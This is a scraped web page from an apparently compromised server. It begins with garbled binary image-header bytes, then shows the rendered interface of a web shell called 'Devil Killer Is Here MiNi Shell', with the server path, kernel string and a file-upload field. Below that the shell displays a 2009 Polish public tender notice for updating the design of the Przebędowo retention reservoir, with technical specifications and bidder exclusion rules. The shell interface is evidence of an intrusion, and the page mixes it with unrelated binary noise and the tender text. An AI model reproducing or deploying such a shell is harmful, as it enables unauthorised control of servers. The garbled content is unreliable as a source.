JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090320/52763-N-2009.html

<p class="kh_header"><b>Poznań: Zbiornik małej retencji Przebędowo gm. Murowana Goślina, pow. poznański, woj. wielkopolskie , Dokumentacja projektowa - aktualizacja.</b><br>
<b>Numer ogłoszenia: 52763 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu , ul. Piekary 17, 60-967 Poznań, woj. wielkopolskie, tel. 061 6475221, faks 061 8525561.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zbiornik małej retencji Przebędowo gm. Murowana Goślina, pow. poznański, woj. wielkopolskie , Dokumentacja projektowa - aktualizacja..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie aktualizacji dokumentacji projektowej pn. Zbiornik małej retencji Przebędowo, wraz z wprowadzeniem zmian polegających na powiększeniu głębokości i pojemności zbiornika.
Cel zamówienia:
Dokumentacja projektowa, sporządzona zgodnie z wymaganiami dla projektu budowlanego, będzie służyć Zamawiającemu do uzyskania wymaganych decyzji, przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych i realizacji inwestycji zgodnie z wymogami Prawa Budowlanego (Dz. U. z 2006r.  nr 156 poz. 1118 z późn. zm.). 
Dokumentacja projektowa musi spełniać wymagania obowiązujących przepisów prawnych i norm oraz pozwolić inwestorowi uzyskanie:
­	decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji, 
­	decyzji pozwolenia wodnoprawnego,
­	decyzji pozwolenia na budowę
­	wdrożenie przed oddaniem budowy monitoringu wód podziemnych i wykonanie pierwszego cyklu badań..
Opracowanie ma być zgodne ze sztuką inżynierską, z wymogami prawa budowlanego, prawa wodnego, ustawie prawo ochrony środowiska oraz innymi przepisami i normami. 
Zakres rzeczowy zadania (zgodnie z aktualnie posiadaną przez zamawiającego dokumentacją):
a)	wykonanie zbiornika retencyjnego kl. IV. w dolinie rzeki Trojanki od km 6+925 do km 8+371rzędne piętrzenia wody:
-	NPP - 72,50 m npm
-	max. P.P. - 73,00 m npm przy przepływie Qk1%
-	min P.P. - 71,50 m npm.
-	przy NPP - 72,50 m npm pow. zalewu 12,03 ha, pojemność Vc=0,162 hm3, śr. gł. zalewu hNPP=1,36 m
-	przy Min PP-71,50 pow. zalewu 10,64 ha, pojemność Vm=0,049 hm3, śr. gł. zalewu hMaxPP= 0,46 m
-	pojemność użytkowa Vu = Vc - Vm = 0,113 hm3
-	wysokość piętrzenia wody - 3,80 m,
-	zamawiający przewiduje powiększenie pojemności zbiornika poprzez częściowe obniżenie  dna.
b)	wykonanie budowli przelewowo-spustowej dł. 21,8 m:
-	żelbetowy dok (2 przelewy czołowe o św. po 2,25 m z koroną z rzędnej 72,45 m npm i dwa przelewy boczne o św. po 2,50 m z korona na rzędnej 72,50 m npm), o łącznej dł. przelewów 9,5 m, z dwoma spustami l,0 x 1,0 m
Budowla zapewni:
-	przeprowadzenie wielkiej wody kontrolnej przy poziomie piętrzenia Max PP=73,00 m npm,
-	przeprowadzenie wielkiej wody miarodajnej przy poziomie piętrzenia 72,70 m npm, przeprowadzenie wody średniej SQ=0,26 m3/s przy poziomie NPP = 72,50 m npm,
-	maksymalny poziom wody w dolnym stanowisku WD = 70,64 m npm,
-	przeprowadzenie przepływu alimentacyjnego przy Q = 0,10 m3/s,
c)	wykonanie zapory czołowej ziemnej kl. IV dł. 334 m o szerokości korony zapory 4,0 m, nachyleniu skarpy odwodnej 1:4, nachyleniu skarpy odpowietrznej 1:3 i 1:10, z drenażem rurowym o 30 i 20 cm w stopie skarpy odpowietrznej,
d)	wykonanie przepławki dla ryb dl. 41,6 m, przy budowli przelewowo-spustowej, z lewej strony, o rzędnej dna wlotu 70,80 m npm, rzędnej dna wylotu - 68,60 m npm i długości komory - 1,9 m, różnicy poziomów wody w komorach - 0,2 m, o średnim spadku dna przepławki i = 7,7%, minimalnej szerokości przesmyków między komorami - 0,15 m, szerokości komory 1,2 m, min. przepływie wody Q = 0,14 m3/s,
e)	wykonanie przebudowy koryta rzeki Trojanki na dł.l2 m poniżej budowli przelewowo-spustowej o szerokości dna 4,65 m, nachyleniu skarp 1:2., z wykonaniem umocnień,
f)	wyprofilowanie dna czaszy zbiornika (pogłębienie), tak aby głębokość wody w zbiorniku była min. 1,0 m. Masy ziemi otrzymane w ten sposób proponuje się przeznaczyć na podwyższenie terenów rolnych położonych bezpośrednio przy zbiorniku, do rzędnej 73,00 m npm na użytkach zielonych i 73,50 m npm na gruntach ornych,
g)	wykonanie drenaży opaskowych wzdłuż zapory (o 20cm do o 40 cm) i rurociągów drenażowych w drodze zakładowej poniżej zapory i wzdłuż zabudowań (o 20cm i o 30cm), z wylotami do rzeki Trojanki, poniżej budowli upustowej. Wywyższenie terenu do rzędnej 72,00 do 72,10 m npm., po stronie wschodniej, na terenie przyległym do zapory (zabezpieczenie zabudowań),
h)	podwyższenie 4 włazów istniejącego zbiornika ścieków do rzędnej 74,00 m npm oraz jego uszczelnienie przez pokrycie materiałami uszczelniającymi,
i)	wykonanie przy koronie zapory od strony odwodnej zamknięcia na istniejącym rurociągu żeliwnym (ujęcie wody dla deszczowni), tj. zasuwy owalnej D = 400 mm umieszczonej w zaprojektowanej żelbetowej studni 2,4 x 2,1 ,
j)	wykonanie nadbudowy przyczółków wlotu ujęcia dla deszczowni, powyżej NPP (do rzędnej 73,00 m npm),
k)	rozebranie rurociągów i drenaży, na odcinkach zalewu i jego wpływu (do rz. 72,50 m npm.), i wykonanie w ich miejsce rowów o szerokości dna 0,5 m, nachyleniu skarp 1:2, śr. gł.1,0 m z umocnieniem skarp kiszką faszynową o15 cm i darniną,
l)	podniesienie powierzchni użytków rolnych położonych na obrzeżach zalewu projektowanego zbiornika i w zasięgu cofki spiętrzonych w nim wód, do rzędnych  min. 73,50 m. npm na gruntach ornych i min 73,00 m. npm na użytkach zielonych.
m)	piętrzenie wody w zbiorniku do rzędnej min PP = 71.50 m npm. NPP =72.50m npm i max PP 73,00m npm, za pomocą budowli upustowo - przelewowej i ziemnej zapory czołowej  w km 6+925 rzeki Trojanki.
Zamówienie będzie dotyczyło następującego zakresu prac:
a.	aktualizacja mapy zasadniczej, 
b.	uzgodnienia z zamawiającym miejsca i zakresu pogłębienia zbiornika,
c.	ewentualne uzupełniające badania geotechniczne i gruntowe,
d.	wykonanie aktualizacji dokumentacji projektowej obejmującej opracowania niezbędne do uzyskania wymaganych decyzji i realizacji inwestycji.
Dokumentacja projektowa powinna zawierać: 
Termin wykonania do dnia : 30.06.2009 r.:
a)	kartę informacyjną przedsięwzięcia (zgodnie z art. 3.1.5 ustawy z 3.10.2008 r. o udostępnianiu informacji środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko( Dz. U. nr 199 poz. 1227). (4 egz. + wersja elektroniczna na CD)
b)	raport oddziaływania na środowisko wraz z mapą zasadniczą i wypisem z ewidencji gruntów (4 egz. + wersja elektroniczna na CD),
c)	komplet uzgodnień formalnych, wymagane uzgodnienia z właścicielami i wykaz gruntów zajmowanych czasowo lub na stałe (oddzielnie oryginał 1 egz. i kopie w dokumentacji projektowej),
Termin wykonania do dnia : 30.11.2009 r.:
d)	operat wodnoprawny (4 egz.), zwierający jako odrębne opracowania:
­	opis prowadzenia zamierzonej działalności (4 egz.)sporządzony w języku nietechnicznym:
­	projekt instrukcji gospodarowania wodą (4 egz.)- na piętrzenie wód powierzchniowych,
e)	projekt budowlany (5 egz.) - na wszystkie elementy przedsięwzięcia,  
Termin wykonania do dnia : 31.03.2010 r.:
f)	projekt  wykonawczy  (5 egz.) - na wszystkie elementy przedsięwzięcia,  
g)	przedmiar robót z podziałem na elementy robót (1 egz.),
h)	kosztorys inwestorski z przedmiarem (1 egz.), 
i)	specyfikację techniczną wykonania i odbioru robót (STWIOR) (3 egz.). 
j)	Materiały w wersji papierowej (1 egz.) i elektronicznej (1 egz. na CD.) jako Opis przedmiotu zamówienia (opis, zestawienia, niezbędne mapy i rysunki, STWiOR, przedmiar robót) niezbędne do przygotowania przez zamawiającego postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1.	Wykonawcą może być osobą fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty te występujące wspólnie jako konsorcjum lub grupa podmiotów zrzeszona dla wykonania konkretnego zamówienia. 
1.2.	W przypadku, gdy o udzielenie zamówienia określonego w niniejszej SIWZ ubiegają się podmioty występujące wspólnie (np. konsorcjum - umowa konsorcjalna) to każdy podmiot z osobna musi spełniać warunek, że nie podlega wykluczeniu na podst. art. 24 ustawy i musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Pozostałe warunki udziału wymienione poniżej podmioty muszą spełniać sumarycznie. 
1.3.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.3.1.	nie podlegają wykluczeniu na podst. art. 24 ustawy. 
1.3.2.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.3.3.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.: 
1.3.3.1.	wykonali prace projektowo w zakresie budowy zbiorników retencyjnych - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie;
1.3.3.2.	dysponują wykwalifikowanym i doświadczonym personelem pracowniczym, osobami odpowiedzialnymi za realizację zamówienia, posiadającymi wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj:  
1.3.3.2.1.	wpisanymi są na listę członków Izby Inżynierów Budownictwa,
1.3.3.2.2.	z uprawnieniami budowlanymi w specjalności budowle hydrotechniczne lub melioracje wodne, 
1.3.3.3.	posiadają lub mają zapewniony dostęp do w pełni sprawnego sprzętu, pojazdów i wyposażenia technicznego w asortymencie i ilościach koniecznych do wykonania zamówienia,
1.3.4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: 
1.3.4.1.	posiadają środki finansowe lub zdolność kredytową w wys. min. 50.000,00 zł. (słownie pięćdziesiąt tysięcy zł).
1.3.4.2.	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
1.3.4.3.	zaakceptują przewidywane warunki płatności/fakturowania: 1 płatność w 2009 r. do kwoty 50 tys. zł i 1 płatność po zakończeniu realizacji zadania.
1.3.4.3.1.	z terminem zapłaty faktur do 30 dni od daty  jej  dostarczenia do zamawiającego. 
1.3.5.	Część lub całość	 zamówienia może być powierzona podwykonawcom. Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, które wykonanie powierzy podwykonawcom.  
1.3.6.	Zaakceptują warunki realizacji zamówienia wynikające z projektu umowy (stanowiącej załącznik do niniejszej specyfikacji). 
1.3.7.	Spełnią pozostałe wymogi SIWZ, złożą wymagane oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu.

1.4.	Z postępowania o udzielenie zamówienia wyklucza się (na podst. art. 24 ust. 1 i 2 ustawy):
1.4.1.	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
1.4.2.	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
1.4.3.	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
1.4.4.	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.4.5.	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.4.6.	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.4.7.	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.4.8.	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.4.9.	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
1.4.10.	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy.
	Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
1.4.11.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2;
1.4.12.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
1.4.13.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3; 
1.4.14.	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
1.5.	Ocena spełnienia warunków udziału:
1.5.1.	Ocenia spełnienia warunków udziału wykonawcy w postępowaniu o udzielenie zamówienia publicznego podlegać będzie na badaniu i ocenie treści oferty i wymaganych dokumentów potwierdzających spełnienie warunków udziału jako spełniony lub niespełniony. 
1.5.2.	Zamawiający wykluczy oferenta z ubiegania się o zamówienie publiczne w konsekwencji negatywnej oceny prawa oferenta do ubiegania się o zamówienie publiczne lub też braku zdolności albo braku potwierdzenia zdolności do wykonania zamówienia na podstawie art. 24 ustawy . 
1.5.2.1.	O wykluczeniu z postępowania zamawiający zawiadomi równocześnie wykonawców, którzy zostali wykluczeni podając uzasadnienie faktyczne i prawne. 
1.5.2.2.	Ofertę wykonawcy wykluczonego z postępowania uznaje się za odrzuconą i nie podlega dalszemu rozpatrywaniu.
1.5.3.	W toku badania i oceny złożonych ofert, zamawiający: 
1.5.3.1.	wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert. 
1.5.3.2.	zgodnie z art.87 ust.1 ustawy, zamawiający może żądać złożenia wyjaśnień dotyczących treści złożonych ofert. 
1.5.3.3.	nie będzie prowadził negocjacji z oferentem, dotyczących złożonej oferty. 
1.5.3.4.	poprawi w ofercie (niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona):
- oczywiste omyłki pisarskie,
- oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,
- inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, niepowodujące istotnych zmian w treści oferty.
1.5.4.	Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 ustawy, a złożona przez wykonawcę oferta nie będzie brała udziału w ocenie ofert w oparciu o kryteria oceny ofert, w przypadku:
1.5.4.1.	treść oferty jest niezgodna z ustawą;
1.5.4.2.	gdy treść złożonej oferty nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy.
1.5.4.3.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
1.5.4.4.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
1.5.4.5.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert;
1.5.4.6.	zawiera błędy w obliczeniu ceny, 
1.5.4.7.	wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie przez Zamawiającego w ofercie innej omyłki (o której mowa w art. 87 ust. 2 pkt. 3 ustawy) polegającej na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, niepowodującej istotnych zmian w treści oferty, 
1.5.4.8.	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać następujące dokumenty :
1.6.	Ofertę - wypełniony wzór formularza oferty (wg załącznika SIWZ Formularz oferty),
1.7.	Oświadczenie oferenta w trybie artykułu 22 ust. 1 ustawy złożone na formularzu stanowiącym załącznik nr 1 do SIWZ do Formularza Oferty (składa także każdy podmiot z osobna, gdy występują wspólnie), 
	oraz w załączeniu:
1.7.1.	Aktualny dokument stanowiący podstawę prawną do prowadzenia przez oferenta działalności gospodarczej w zakresie objętym zamówieniem  (odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, kopia koncesji lub zezwolenie, jeżeli odrębne przepisy wymagają posiadania koncesji lub zezwolenia na podjęcie działalności gospodarczej w zakresie objętym zamówieniem) zawierający dane od ostatniej zmiany- wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (składa także każdy podmiot z osobna, gdy występują wspólnie);
1.7.2.	Upoważnienie do podpisania oferty, o ile nie wynika ono z w/w dokumentów.
1.7.3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (składa także każdy podmiot z osobna, gdy występują wspólnie);
1.7.4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (składa także każdy podmiot z osobna, gdy występują wspólnie);
